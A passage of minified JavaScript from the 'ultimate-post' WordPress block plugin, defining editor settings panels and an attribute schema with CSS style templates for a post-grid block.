Image","ultimate-post")}}],exclude:["imgMargin"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:v.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:v["taxonomy-/-category"],depend:"catShow",store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:v.excerpt,store:t,include:[{position:3,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:4,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},"layout1"==l&&"style1"!=n&&{position:8,data:{type:"dimension",key:"excerptPadddingLg",label:__("Padding ( Large Post )","ultimate-post"),step:1,unit:!0,responsive:!0}}],hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:v["read-more"],depend:"readMore"}),(0,o.createElement)(a.rS,{initialOpen:v.video,depend:"vidIconEnable",store:t}),"layout1"!=l&&(0,o.createElement)(a.$U,{store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),(0,o.createElement)(a.Yp,{depend:"separatorShow",exclude:["septSpace"],store:t}),!y&&(0,o.createElement)(i.Z,{open:v.filter||v.pagination||v.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:v.heading,depend:"headingShow"}),"posts"!=r&&"customPosts"!=r&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:v.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:v.pagination,depend:"paginationShow",store:t}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{gridStyle:l,layout:i,V4_1_0_CompCheck:{runComp:s}}=t.attributes,{metaShow:p,showImage:c,titleShow:m,catPosition:g,titlePosition:y,excerptShow:b,readMore:v,metaPosition:h,fallbackEnable:f,catShow:k}=t.attributes,w=[p&&"bottom"==h,v,b,f&&c&&"style3"!=l,m&&0==y,p&&"top"==h,m&&1==y,k&&"aboveTitle"==g,f&&c&&"style3"==l];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:w});switch(e){case"filter":return s?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return s?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return s?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo","style1"!=l&&{data:{type:"typography",key:"postListTypo",label:__("Large Title Typography","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:3,data:{type:"toggle",key:"fullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:4,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},"layout1"==i&&"style1"!=l&&{position:8,data:{type:"dimension",key:"excerptPadddingLg",label:__("Padding ( Large Post )","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}));default:return null}}},36682:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},gridStyle:{type:"string",default:"style1"},columns:{type:"object",default:{lg:"2",sm:"2",xs:"1"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},rowSpace:{type:"object",default:{lg:"30"},style:[{depends:[{key:"separatorShow",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-row {row-gap: {{rowSpace}}px; }"},{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { padding-bottom: {{rowSpace}}px; margin-bottom:{{rowSpace}}px; }"}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a { text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-entry-heading .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-entry-heading .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"30",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"gridStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title,\n                    {{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a"},{depends:[{key:"titleShow",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:first-child .ultp-block-title,\n                    {{ULTP}} .ultp-block-items-wrap .ultp-block-item:first-child .ultp-block-title a"}]},postListTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:not(:first-child) .ultp-block-title,\n                    {{ULTP}} .ultp-block-items-wrap .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-entry-heading .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"==",value:"style2"}]},{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"==",value:"style3"}]}]},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { max-width: {{imgWidth}}; display: block; }\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-image img { width: 100% }\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content iframe { max-width: {{imgWidth}}; width: 100% !important; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img,\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n                    {{ULTP}} .ultp-block-item .ultp-block-video-content iframe { height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"none"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"20"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { margin-bottom: {{imgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},fullExcerptLg:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptLimitLg:{type:"string",default:70,style:[{depends:[{key:"fullExcerptLg",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt,   \n                {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n                    {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-entry-content,\n                    {{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }\n                    {{ULTP}} .ultp-block-meta { justify-content: flex-start; }\n                    {{ULTP}} .ultp-block-image img { margin-right: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-entry-content,\n                    {{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }\n                    {{ULTP}} .ultp-block-meta {justify-content: center;}\n                    {{ULTP}} .ultp-block-image img { margin: 0 auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-entry-content,\n                    {{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; }\n                    {{ULTP}} .ultp-block-meta {justify-content: flex-end;} .rtl \n                    {{ULTP}} .ultp-block-meta {justify-content: start;}  \n                    {{ULTP}} .ultp-block-image img { margin-left: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl\n                    {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content\n                    {{ULTP}} .ultp-block-entry-heading { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},headerWidth:{type:"object",default:{lg:"70",unit:"%"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { max-width: {{headerWidth}}; }"}]},headerWrapBg:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { background:{{headerWrapBg}}; }"}]},headerWrapHoverBg:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading:hover { background:{{headerWrapHoverBg}}; }"}]},headerWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Contrast_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading"}]},headerWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading:hover"}]},headerWrapRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { border-radius: {{headerWrapRadius}}; }"}]},headerWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading:hover { border-radius: {{headerWrapHoverRadius}}; }"}]},headerSpaceX:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-block-entry-heading { left: {{headerSpaceX}}; }"},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-block-entry-heading { left: {{headerSpaceX}};transform: translateX(0%);right:auto }"},{depends:[{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-block-entry-heading { right: {{headerSpaceX}};left:auto; }"}]},headerSpaceY:{type:"object",default:{lg:"30"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { top: -{{headerSpaceY}}px; }\n                    {{ULTP}} .ultp-block-item { margin-top: {{headerSpaceY}}px; }"}]},headerWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-block-entry-heading { padding: {{headerWrapPadding}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"#e5e5e5",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-width: {{septSize}}px; 